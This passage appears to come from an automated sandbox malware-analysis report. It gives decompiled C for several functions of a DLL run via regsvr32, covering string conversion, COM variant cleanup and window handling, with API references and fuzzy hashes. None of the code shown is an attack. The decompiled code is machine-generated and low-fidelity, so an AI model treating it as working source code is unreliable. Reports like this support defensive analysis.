				_t91 =  *0x1003a4dc - _t83; // 0x1
				if(_t91 == 0) {
					if(GetStringTypeW(1, 0x1002e9cc, 1, _t85 - 0x1c) == 0) {
						_t65 = GetLastError();
						__eflags = _t65 - 0x78;
						if(_t65 == 0x78) {
							 *0x1003a4dc = 2;
						}
					} else {
						 *0x1003a4dc = 1;
					}
				}
				_t42 =  *0x1003a4dc; // 0x1
				if(_t42 == 2 || _t42 == _t83) {
					_t67 =  *(_t85 + 0x1c);
					__eflags = _t67 - _t83;
					if(_t67 == _t83) {
						_t67 =  *0x1003a4c0; // 0x0
					}
					_t77 =  *(_t85 + 0x18);
					__eflags = _t77;
					if(_t77 == 0) {
						_t77 =  *0x1003a4d0; // 0x0
					}
					_t43 = E10019AB4(_t67);
					__eflags = _t43 - 0xffffffff;
					if(_t43 != 0xffffffff) {
						__eflags = _t43 - _t77;
						if(__eflags == 0) {
							L29:
							_t78 = GetStringTypeA(_t67,  *(_t85 + 8),  *(_t85 + 0xc),  *(_t85 + 0x10),  *(_t85 + 0x14));
							__eflags = _t83;
							if(_t83 != 0) {
								_push(_t83);
								E1001111B();
							}
							_t45 = _t78;
							goto L32;
						}
						_push(0);
						_push(0);
						_push(_t85 + 0x10);
						_push( *(_t85 + 0xc));
						_push(_t43);
						_push(_t77);
						_t83 = E10019AF7(_t67, _t77, _t83, __eflags);
						__eflags = _t83;
						if(_t83 == 0) {
							goto L25;
						}
						 *(_t85 + 0xc) = _t83;
						goto L29;
					} else {
						goto L25;
					}
				} else {
					if(_t42 != 1) {
						L25:
						_t45 = 0;
						L32:
						return E10012D1B(_t45);
					}
					 *(_t85 - 0x24) = _t83;
					 *(_t85 - 0x20) = _t83;
					if( *(_t85 + 0x18) == _t83) {
						_t62 =  *0x1003a4d0; // 0x0
						 *(_t85 + 0x18) = _t62;
					}
					_t79 = MultiByteToWideChar( *(_t85 + 0x18), 1 + (0 |  *((intOrPtr*)(_t85 + 0x20)) != _t83) * 8,  *(_t85 + 0xc),  *(_t85 + 0x10), _t83, _t83);
					 *(_t85 - 0x28) = _t79;
					if(_t79 == 0) {
						goto L25;
					} else {
						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
						_t68 = _t79 + _t79;
						E100116D0(_t79 + _t79 + 0x00000003 & 0xfffffffc, _t69);
						 *(_t85 - 0x18) = _t86;
						_t84 = _t86;
						 *(_t85 - 0x2c) = _t84;
						E10012400(_t84, 0, _t79 + _t79);
						 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
						_t99 = _t84;
						if(_t84 != 0) {
							L15:
							_t58 = MultiByteToWideChar( *(_t85 + 0x18), 1,  *(_t85 + 0xc),  *(_t85 + 0x10), _t84, _t79);
							if(_t58 != 0) {
								 *(_t85 - 0x24) = GetStringTypeW( *(_t85 + 8), _t84, _t58,  *(_t85 + 0x14));
							}
							if( *(_t85 - 0x20) != 0) {
								_push(_t84);
								E1001111B();
							}
							_t45 =  *(_t85 - 0x24);
							goto L32;
						} else {
							_push(_t79);
							_push(2);
							_t84 = E10013955(_t68, _t79, _t84, _t99);
							if(_t84 == 0) {
								goto L25;
							}
							 *(_t85 - 0x20) = 1;
							goto L15;
						}
					}
				}
			}

0x10018622
0x10018622
0x10018624
0x10018629
0x1001862e
0x10018630
0x10018636
0x1001864e
0x10018658
0x1001865e
0x10018661
0x10018663
0x10018663
0x10018650
0x10018650
0x10018650
0x1001864e
0x1001866d
0x10018675
0x10018765
0x10018768
0x1001876a
0x1001876c
0x1001876c
0x10018772
0x10018775
0x10018777
0x10018779
0x10018779
0x10018780
0x10018786
0x10018789
0x1001878f
0x10018791
0x100187b1
0x100187c4
0x100187c6
0x100187c8
0x100187ca
0x100187cb
0x100187d0
0x100187d1
0x00000000
0x100187d1
0x10018793
0x10018795
0x1001879a
0x1001879b
0x1001879e
0x1001879f
0x100187a8
0x100187aa
0x100187ac
0x00000000
0x00000000
0x100187ae
0x00000000
0x00000000
0x00000000
0x00000000
0x10018683
0x10018686
0x1001878b
0x1001878b
0x100187d3
0x100187db
0x100187db
0x1001868c
0x1001868f
0x10018695
0x10018697
0x1001869c
0x1001869c
0x100186c0
0x100186c2
0x100186c7
0x00000000
0x100186cd
0x100186cd
0x100186d1
0x100186dc
0x100186e1
0x100186e4
0x100186e6
0x100186ed
0x100186f5
0x10018710
0x10018712
0x1001872b
0x10018738
0x10018740
0x10018750
0x10018750
0x10018757
0x10018759
0x1001875a
0x1001875f
0x10018760
0x00000000
0x10018714
0x10018714
0x10018715
0x1001871e
0x10018722
0x00000000
0x00000000
0x10018724
0x00000000
0x10018724
0x10018712
0x100186c7

APIs

GetStringTypeW.KERNEL32(00000001,1002E9CC,00000001,?,1002F210,0000001C,100126EF,00000001,00000020,00000100,?,00000000), ref: 10018646
GetLastError.KERNEL32 ref: 10018658
MultiByteToWideChar.KERNEL32(?,00000000,00000000,100129C0,00000000,00000000,1002F210,0000001C,100126EF,00000001,00000020,00000100,?,00000000), ref: 100186BA
MultiByteToWideChar.KERNEL32(?,00000001,00000000,100129C0,?,00000000), ref: 10018738
GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 1001874A

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharMultiStringTypeWide$ErrorLast
String ID:
API String ID: 3581945363-0
Opcode ID: 9e7710add94300a0b692bc124a61e5eff74299164c9d089cdf89c9ca6e0ffffa
Instruction ID: 72fb5dbd7d0f1b114274a67e54598b18d63c25f91f6341cba252275a418feeec
Opcode Fuzzy Hash: 9e7710add94300a0b692bc124a61e5eff74299164c9d089cdf89c9ca6e0ffffa
Instruction Fuzzy Hash: 0C417935800629AFDB12CF608C89AAE3BB5EF497A0F214105F910AE1A1D731DBD1DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000F5DD Relevance: 9.1, APIs: 6, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E1000F5DD(void* __ecx, void* __edx) {
				signed int _t73;
				intOrPtr _t85;
				intOrPtr* _t89;
				intOrPtr* _t92;
				intOrPtr* _t94;
				void* _t99;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t122;
				void* _t124;
				void* _t126;
				void* _t128;
				void* _t129;

				_t117 = __edx;
				E10011A8C(E1002AD8F, _t126);
				_t129 = _t128 - 0x6c;
				_t73 = 0;
				_t124 = __ecx;
				 *((intOrPtr*)(__ecx + 0x44)) = 1;
				 *(_t126 - 0x10) = 0;
				 *(_t126 - 0x18) = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
					L21:
					 *(_t124 + 0x44) =  *(_t124 + 0x44) & 0x00000000;
					 *[fs:0x0] =  *((intOrPtr*)(_t126 - 0xc));
					return 0;
				}
				do {
					_t109 =  *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x14)) + (_t73 + _t73 * 4 << 3) + 0x24));
					if(_t109 == 0) {
						goto L19;
					}
					_t110 =  *((intOrPtr*)(_t109 + 4));
					 *((intOrPtr*)(_t126 - 0x20)) = _t110;
					if(_t110 == 0) {
						goto L19;
					}
					 *(_t126 - 0x14) =  *(_t126 - 0x10) << 4;
					do {
						_t122 =  *((intOrPtr*)(E10007404(_t126 - 0x20)));
						 *((intOrPtr*)(_t126 - 0x24)) = 0xfffffffd;
						E10012400(_t126 - 0x78, 0, 0x20);
						_t129 = _t129 + 0xc;
						E1001064A(_t126 - 0x48);
						 *(_t126 - 4) =  *(_t126 - 4) & 0x00000000;
						_t135 =  *((intOrPtr*)(_t124 + 0x48));
						if( *((intOrPtr*)(_t124 + 0x48)) == 0) {
							_t85 =  *((intOrPtr*)(_t124 + 0x40)) +  *(_t126 - 0x14);
							__eflags = _t85;
						} else {
							_t99 = E1000F0B5(_t124, _t117, _t135, _t126 - 0x58,  *(_t126 - 0x18) + 1);
							 *(_t126 - 4) = 1;
							E10010630(_t99, _t126 - 0x48, _t99);
							 *(_t126 - 4) = 0;
							__imp__#9(_t126 - 0x58);
							_t85 = _t126 - 0x48;
						}
						 *((intOrPtr*)(_t126 - 0x38)) = _t85;
						 *((intOrPtr*)(_t126 - 0x34)) = _t126 - 0x24;
						 *((intOrPtr*)(_t126 - 0x30)) = 1;
						 *((intOrPtr*)(_t126 - 0x2c)) = 1;
						 *(_t122 + 0x84) = 1;
						_t89 =  *((intOrPtr*)(_t122 + 0x4c));
						if(_t89 != 0) {
							_t117 = _t126 - 0x1c;
							_push(_t126 - 0x1c);
							_push(0x1002cfe8);
							_push(_t89);
							if( *((intOrPtr*)( *_t89))() >= 0) {
								_t92 =  *((intOrPtr*)(_t126 - 0x1c));
								_t117 = _t126 - 0x38;
								 *((intOrPtr*)( *_t92 + 0x18))(_t92,  *((intOrPtr*)(_t122 + 0x98)), 0x1002fb68, 0, 4, _t126 - 0x38, 0, _t126 - 0x78, _t126 - 0x28);
								_t94 =  *((intOrPtr*)(_t126 - 0x1c));
								 *((intOrPtr*)( *_t94 + 8))(_t94);
								 *(_t122 + 0x84) =  *(_t122 + 0x84) & 0x00000000;
								if( *((intOrPtr*)(_t126 - 0x74)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x74)));
								}
								if( *((intOrPtr*)(_t126 - 0x70)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x70)));
								}
								if( *((intOrPtr*)(_t126 - 0x6c)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x6c)));
								}
								 *(_t126 - 0x10) =  *(_t126 - 0x10) + 1;
								 *(_t126 - 0x14) =  *(_t126 - 0x14) + 0x10;
							}
						}
						 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
						__imp__#9(_t126 - 0x48);
					} while ( *((intOrPtr*)(_t126 - 0x20)) != 0);
					_t73 =  *(_t126 - 0x18);
					L19:
					_t73 = _t73 + 1;
					 *(_t126 - 0x18) = _t73;
				} while (_t73 <  *((intOrPtr*)(_t124 + 0x10)));
				goto L21;
			}

0x1000f5dd
0x1000f5e2
0x1000f5e7
0x1000f5ea
0x1000f5ed
0x1000f5f2
0x1000f5f9
0x1000f5fc
0x1000f5ff
0x1000f76a
0x1000f76a
0x1000f774
0x1000f77c
0x1000f77c
0x1000f607
0x1000f610
0x1000f616
0x00000000
0x00000000
0x1000f61c
0x1000f621
0x1000f624
0x00000000
0x00000000
0x1000f630
0x1000f633
0x1000f643
0x1000f64d
0x1000f654
0x1000f659
0x1000f660
0x1000f665
0x1000f669
0x1000f66d
0x1000f6a2
0x1000f6a2
0x1000f66f
0x1000f67a
0x1000f683
0x1000f687
0x1000f690
0x1000f694
0x1000f69a
0x1000f69a
0x1000f6a5
0x1000f6ab
0x1000f6b1
0x1000f6b4
0x1000f6b7
0x1000f6bd
0x1000f6c2
0x1000f6c6
0x1000f6c9
0x1000f6ca
0x1000f6cf
0x1000f6d4
0x1000f6d6
0x1000f6e5
0x1000f6f9
0x1000f6fc
0x1000f702
0x1000f705
0x1000f710
0x1000f715
0x1000f715
0x1000f71f
0x1000f724
0x1000f724
0x1000f72e
0x1000f733
0x1000f733
0x1000f739
0x1000f73c
0x1000f73c
0x1000f6d4
0x1000f740
0x1000f748
0x1000f74e
0x1000f758
0x1000f75b
0x1000f75b
0x1000f75f
0x1000f75f
0x00000000

APIs

__EH_prolog.LIBCMT ref: 1000F5E2
VariantClear.OLEAUT32(?), ref: 1000F694
SysFreeString.OLEAUT32(00000000), ref: 1000F715
SysFreeString.OLEAUT32(00000000), ref: 1000F724
SysFreeString.OLEAUT32(00000000), ref: 1000F733
VariantClear.OLEAUT32(00000000), ref: 1000F748

Part of subcall function 1000F0B5: __EH_prolog.LIBCMT ref: 1000F0BA
Part of subcall function 1000F0B5: VariantClear.OLEAUT32(?), ref: 1000F11C

Part of subcall function 10010630: VariantCopy.OLEAUT32(?,?), ref: 10010638

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Variant$ClearFreeString$H_prolog$Copy
String ID:
API String ID: 3098219910-0
Opcode ID: d6e461061404aa7110846635b78fe777096a90a479a0edbbc710177d16e33837
Instruction ID: d0e020890206fa544cdbdc31bb25f29c8d17751cf2acc9d8ee25091c18e8f44e
Opcode Fuzzy Hash: d6e461061404aa7110846635b78fe777096a90a479a0edbbc710177d16e33837
Instruction Fuzzy Hash: B85147B1900609DFEB54CFA8C884BEEBBB8FF48345F10012DE11AEB695D775A945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10025B82 Relevance: 9.1, APIs: 6, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10025B82(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E10025B49();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x1c);
					goto L7;
				}
				_t13 = E10006E47();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}

0x10025b8a
0x10025b92
0x10025b94
0x10025bb1
0x10025bbf
0x10025bca
0x10025bcc
0x10025bce
0x10025bd0
0x10025bdb
0x10025bdd
0x10025bea
0x10025bea
0x10025bec
0x10025bf2
0x10025bf6
0x10025c14
0x10025c07
0x10025c0a
0x10025c0c
0x10025c0c
0x10025bf6
0x10025c1d
0x00000000
0x00000000
0x00000000
0x10025bd2
0x10025bd2
0x10025bd3
0x10025bd5
0x10025bd7
0x00000000
0x10025bd2
0x10025bc4
0x10025bc6
0x10025bc8
0x00000000
0x00000000
0x00000000
0x10025bc8
0x10025b96
0x10025b9d
0x10025bac
0x10025bac
0x00000000
0x10025bac
0x10025b9f
0x10025ba6
0x00000000
0x00000000
0x10025ba8
0x00000000

APIs

GetWindowLongA.USER32 ref: 10025BB4
GetParent.USER32(?), ref: 10025BC2
GetParent.USER32(?), ref: 10025BD5
GetLastActivePopup.USER32(?), ref: 10025BE4
IsWindowEnabled.USER32(?), ref: 10025BF9
EnableWindow.USER32(?,00000000), ref: 10025C0C

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: f546e8be2e24b85187661f69a342f864b22fd1f965cfd822eb4daf6f070cda95
Instruction ID: eef36b0e69d94cf7a6bfa3ed5178a409b44f01464191526325d0f495a7c3fed6
Opcode Fuzzy Hash: f546e8be2e24b85187661f69a342f864b22fd1f965cfd822eb4daf6f070cda95
Instruction Fuzzy Hash: F41151326017365BD263EA696CC0B1EB2ECDF45AA3FA24115EC06D7212DB72DC0146E9

Uniqueness

Uniqueness Score: -1.00%

Function 10025364 Relevance: 9.0, APIs: 6, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10025364(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_t12 = GetWindow(_a4, 5);
				while(1) {
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_t12 = GetWindow(_t21, 2);
				}
				return _t12;
			}

0x10025373
0x100253c4
0x100253c4
0x100253c6
0x100253ca
0x00000000
0x00000000
0x10025390
0x100253a7
0x100253ad
0x100253bf
0x00000000
0x100253d2
0x100253bf
0x100253c4
0x100253c4
0x100253cf

APIs

ClientToScreen.USER32(?,?), ref: 10025373
GetDlgCtrlID.USER32 ref: 10025387
GetWindowLongA.USER32 ref: 10025395
GetWindowRect.USER32 ref: 100253A7
PtInRect.USER32(?,?,?), ref: 100253B7
GetWindow.USER32(?,00000005), ref: 100253C4

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: b209f59fc19bdd5bf6ab9cb9d3746cc2aee40968c7130de26e90267ab12c8d46
Instruction ID: f29aa1391cdb4093ea9c1d2b87e7f35b414104477a39d1cbb50fc2286be9e58f
Opcode Fuzzy Hash: b209f59fc19bdd5bf6ab9cb9d3746cc2aee40968c7130de26e90267ab12c8d46
Instruction Fuzzy Hash: 4F01D63110062ABBDB11EF549C88EDE37BCEF007D2F945015FD12A6161D771DB129B98

Uniqueness

Uniqueness Score: -1.00%

Function 10020BD1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10020BD1(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				long _t34;
				long _t43;
				struct HWND__* _t48;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E1001E164();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x1c)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x1c)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x20)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x44));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x44)) = 0;
				}
				_t64 =  *(_t72 + 0x48);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x48) =  *(_t72 + 0x48) & 0x00000000;
				if(( *(_t72 + 0x38) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E1002776D() + 0x3c));
					if(_t71 != 0 &&  *(_t71 + 0x1c) != 0) {
						E10012400( &_v52, 0, 0x30);
						_t48 =  *(_t72 + 0x1c);
						_v44 = _t48;
						_v40 = _t48;
						_v52 = 0x28;
						_v48 = 1;
						SendMessageA( *(_t71 + 0x1c), 0x405, 0,  &_v52);
					}
				}
				_t34 = GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc);
				E100209E9(_t72);
				if(GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc) == _t34) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x1c), 0xfffffffc, _t43);
					}
				}
				E10020B06(_t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}

0x10020bda
0x10020be1
0x10020be7
0x10020bec
0x10020c11
0x10020c11
0x10020c17
0x10020c19
0x10020c19
0x10020c17
0x10020c1c
0x10020c21
0x10020c25
0x10020c28
0x10020c28
0x10020c2b
0x10020c33
0x10020c38
0x10020c38
0x10020c3b
0x10020c42
0x10020c49
0x10020c4e
0x10020c5e
0x10020c63
0x10020c69
0x10020c6c
0x10020c7d
0x10020c84
0x10020c87
0x10020c87
0x10020c4e
0x10020c99
0x10020c9f
0x10020cae
0x10020cba
0x10020cbe
0x10020cc6
0x10020cc6
0x10020cbe
0x10020cce
0x10020ce1

APIs

SendMessageA.USER32 ref: 10020C87
GetWindowLongA.USER32 ref: 10020C99
GetWindowLongA.USER32 ref: 10020CAA
SetWindowLongA.USER32(?,000000FC,?), ref: 10020CC6

Strings

(, xrefs: 10020C7D

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: (
API String ID: 2178440468-3887548279
Opcode ID: 0b6acb89b732486343ceec0c97bf216dde0e4bab9400b203ec829346fde65810
Instruction ID: 95e974d3db5210fca6443694d2ff9e1c0aed1c225dc02d5b9e11b7c39b1793d1
Opcode Fuzzy Hash: 0b6acb89b732486343ceec0c97bf216dde0e4bab9400b203ec829346fde65810
Instruction Fuzzy Hash: D931CFB46007159FDB11EFA8E884A5AB7FAFF04250F61462DF54297693DB30E841CB94

Uniqueness

Uniqueness Score: -1.00%

Function 10014796 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E10014796(void* __ecx, void* __eflags) {
				void* _t55;

				E100114D8(__ecx, __eflags);
				 *((intOrPtr*)(_t55 - 0x1c)) = 0;
				 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
				__eflags =  *(__ebp - 0x1c);
				if( *(__ebp - 0x1c) != 0) {
					L5:
					__eax = WideCharToMultiByte( *(__ebp + 0x20), __ebx,  *(__ebp + 0x10),  *(__ebp + 0x14),  *(__ebp - 0x1c),  *(__ebp - 0x20), __ebx, __ebx);
					__eflags = __eax;
					if(__eax == 0) {
						L21:
						__edi =  *(__ebp - 0x34);
						L22:
						__eflags =  *(__ebp - 0x28) - __ebx;
						if( *(__ebp - 0x28) != __ebx) {
							__eax = E1001111B();
							__ecx = __edi;
						}
						__eflags =  *((intOrPtr*)(__ebp - 0x2c)) - __ebx;
						if( *((intOrPtr*)(__ebp - 0x2c)) != __ebx) {
							_push( *(__ebp - 0x1c));
							__eax = E1001111B();
							_pop(__ecx);
						}
						__eax =  *(__ebp - 0x24);
						L27:
						return E10012D1B(0);
					}
					__eax = LCMapStringA( *(__ebp + 8),  *(__ebp + 0xc),  *(__ebp - 0x1c),  *(__ebp - 0x20), __ebx, __ebx);
					__esi = __eax;
					 *(__ebp - 0x30) = __esi;
					__eflags = __esi - __ebx;
					if(__esi == __ebx) {
						goto L21;
					}
					 *(__ebp - 4) = __edi;
					__eax =  &(__eax[3]);
					__eax = E100116D0(__eax, __ecx);
					 *(__ebp - 0x18) = __esp;
					__edi = __esp;
					 *(__ebp - 0x34) = __edi;
					 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
					__eflags = __edi - __ebx;
					if(__edi != __ebx) {
						L11:
						__eax = LCMapStringA( *(__ebp + 8),  *(__ebp + 0xc),  *(__ebp - 0x1c),  *(__ebp - 0x20), __edi, __esi);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags =  *(__ebp + 0xd) & 0x00000004;
							if(( *(__ebp + 0xd) & 0x00000004) == 0) {
								__eflags =  *(__ebp + 0x1c) - __ebx;
								if( *(__ebp + 0x1c) != __ebx) {
									_push( *(__ebp + 0x1c));
									_push( *((intOrPtr*)(__ebp + 0x18)));
								} else {
									_push(__ebx);
									_push(__ebx);
								}
								 *(__ebp - 0x24) = MultiByteToWideChar( *(__ebp + 0x20), 1, __edi, __esi, ??, ??);
							} else {
								 *(__ebp - 0x24) = __esi;
								__eflags =  *(__ebp + 0x1c) - __ebx;
								if( *(__ebp + 0x1c) != __ebx) {
									__eflags =  *(__ebp + 0x1c) - __esi;
									if( *(__ebp + 0x1c) < __esi) {
										__esi =  *(__ebp + 0x1c);
									}
									__eax = E10019990( *((intOrPtr*)(__ebp + 0x18)), __edi, __esi);
								}
							}
						}
						goto L22;
					} else {
						__edi = E10011233(__esi);
						__eflags = __edi - __ebx;
						if(__edi == __ebx) {
							goto L22;
						}
						 *(__ebp - 0x28) = 1;
						goto L11;
					}
				} else {
					__eax = E10011233( *(__ebp - 0x20));
					 *(__ebp - 0x1c) = __eax;
					__eflags = __eax;
					if(__eax == 0) {
						goto L1;
					}
					 *((intOrPtr*)(__ebp - 0x2c)) = 1;
					goto L5;
				}
				L1:
				goto L27;
			}

0x10014799
0x100147a0
0x100147a3
0x100147aa
0x100147ad
0x100147c2
0x100147d4
0x100147da
0x100147dc
0x100148ac
0x100148ac
0x100148af
0x100148af
0x100148b2
0x100148b5
0x100148ba
0x100148ba
0x100148bb
0x100148be
0x100148c0
0x100148c3
0x100148c8
0x100148c8
0x100148c9
0x100148cc
0x100148d4
0x100148d4
0x100147f0
0x100147f6
0x100147f8
0x100147fb
0x100147fd
0x00000000
0x00000000
0x10014803
0x10014806
0x1001480c
0x10014811
0x10014814
0x10014816
0x10014819
0x10014836
0x10014838
0x1001484e
0x1001485c
0x10014862
0x10014864
0x10014866
0x1001486a
0x1001488b
0x1001488e
0x10014894
0x10014897
0x10014890
0x10014890
0x10014891
0x10014891
0x100148a7
0x1001486c
0x1001486c
0x1001486f
0x10014872
0x10014874
0x10014877
0x10014879
0x10014879
0x10014881
0x10014886
0x10014872
0x1001486a
0x00000000
0x1001483a
0x10014841
0x10014843
0x10014845
0x00000000
0x00000000
0x10014847
0x00000000
0x10014847
0x100147af
0x100147b2
0x100147b8
0x100147bb
0x100147bd
0x00000000
0x00000000
0x100147bf
0x00000000
0x100147bf
0x1001476f
0x00000000

APIs

Part of subcall function 100114D8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 100114F2
Part of subcall function 100114D8: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 10011503
Part of subcall function 100114D8: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 10011549

WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000,?,?), ref: 100147D4
LCMapStringA.KERNEL32(?,?,?,?,00000000,00000000,?,?), ref: 100147F0
LCMapStringA.KERNEL32(?,?,?,?,?,00000000,?,?), ref: 1001485C
_strncpy.LIBCMT ref: 10014881

Strings

@hvpYv, xrefs: 100147D4

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: QueryStringVirtual$ByteCharInfoMultiSystemWide_strncpy
String ID: @hvpYv
API String ID: 1411509361-2766943729
